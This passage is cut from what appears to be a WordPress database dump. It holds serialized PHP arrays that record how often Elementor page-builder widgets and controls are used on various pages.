;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:8;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:10;s:16:\"content_position\";i:1;s:21:\"space_between_widgets\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8564,2987,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:12;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:12;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:19;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:16;s:16:\"content_position\";i:1;s:21:\"space_between_widgets\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:4;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:1:{s:27:\"background_hover_background\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8565,2972,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:10;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:12;s:16:\"content_position\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:4;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}}'),(8566,2954,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:10;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:6;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:12;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}s:13:\"image-gallery\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:15:\"section_gallery\";a:3:{s:10:\"wp_gallery\";i:2;s:14:\"thumbnail_size\";i:2;s:15:\"gallery_columns\";i:2;}}}}}'),(8567,2940,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:10;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:5;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:17;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:14;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:4;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}}'),(8568,2928,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:16;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:13;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:22;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:20;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:8;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:3;}}}}s:13:\"image-gallery\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:15:\"section_gallery\";a:4:{s:10:\"wp_gallery\";i:1;s:14:\"thumbnail_size\";i:1;s:15:\"gallery_columns\";i:1;s:13:\"open_lightbox\";i:1;}}}}}'),(8569,2906,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:16;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:7;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:25;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:21;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:5;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:12;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:8;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:2;}}}}}'),(8570,2885,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:8;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:8;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:10;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:3;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:5;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:2;}}}}}'),(8571,2834,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8572,2580,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:16;s:11:\"header_size\";i:16;s:5:\"align\";i:16;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:16;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:18;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:15;s:21:\"space_between_widgets\";i:5;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:13;s:10:\"image_size\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:13;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:13;}}}}}'),(8573,2000,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:13;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:10;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:20;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:17;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:4;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:7;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}}'),(8574,1620,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:14;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:5:\"align\";i:4;s:10:\"text_color\";i:6;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:12;s:16:\"content_position\";i:2;s:5:\"align\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:2;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:5:{s:21:\"background_background\";i:1;s:16:\"background_image\";i:1;s:19:\"background_position\";i:1;s:21:\"background_attachment\";i:1;s:15:\"background_size\";i:1;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:1;s:11:\"header_size\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}}'),(8575,1555,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:11;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:8;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:8;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:5:\"align\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:3;}}}}}'),(8576,1532,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:41;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:41;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:13;}}s:8:\"advanced\";a:1:{s:19:\"_section_background\";a:1:{s:22:\"_background_background\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:49;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:41;s:16:\"content_position\";i:1;s:5:\"align\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:2;}}s:5:\"style\";a:2:{s:13:\"section_style\";a:1:{s:16:\"background_color\";i:2;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:13:\"border_radius\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:28;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:20;}}s:5:\"style\";a:2:{s:14:\"section_border\";a:4:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;s:13:\"border_radius\";i:11;}s:18:\"section_background\";a:2:{s:21:\"background_background\";i:11;s:16:\"background_color\";i:10;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:3;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}}'),(8577,1531,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:18;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:18;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:22;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:14;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:13:\"content_width\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}}'),(8578,1530,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:20;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:20;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:21:\"typography_typography\";i:3;s:22:\"typography_line_height\";i:3;s:25:\"typography_letter_spacing\";i:3;s:12:\"text_columns\";i:3;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:22;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:21:\"space_between_widgets\";i:3;s:12:\"_inline_size\";i:16;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:3;s:7:\"padding\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:3;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:2;}}}}}'),(8579,1534,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:29;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:29;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"column_gap\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:37;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:24;s:16:\"content_position\";i:1;s:5:\"align\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:22;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:9;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:8;s:16:\"background_color\";i:8;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:3;s:5:\"align\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:3;}}}}}'),(8580,1529,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:39;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:39;}}s:8:\"advanced\";a:2:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:2;}s:15:\"_section_border\";a:1:{s:13:\"_border_color\";i:6;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:44;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:10;s:7:\"padding\";i:6;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:30;s:16:\"content_position\";i:9;s:5:\"align\";i:9;}}s:5:\"style\";a:1:{s:14:\"section_border\";a:1:{s:12:\"border_color\";i:26;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:26;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:2:{s:13:\"content_width\";i:6;s:8:\"overflow\";i:6;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:12;}}s:5:\"style\";a:1:{s:14:\"section_border\";a:3:{s:13:\"border_border\";i:3;s:12:\"border_width\";i:3;s:12:\"border_color\";i:6;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:3;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8581,1528,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:15;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:12;s:21:\"space_between_widgets\";i:6;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:11;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:6;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:6;s:16:\"background_color\";i:6;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:8;s:12:\"border_color\";i:8;s:13:\"border_radius\";i:8;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:5;}}}}}'),(8582,1486,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:44;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:44;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:6;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:10;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:49;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:36;s:21:\"space_between_widgets\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:25;s:15:\"con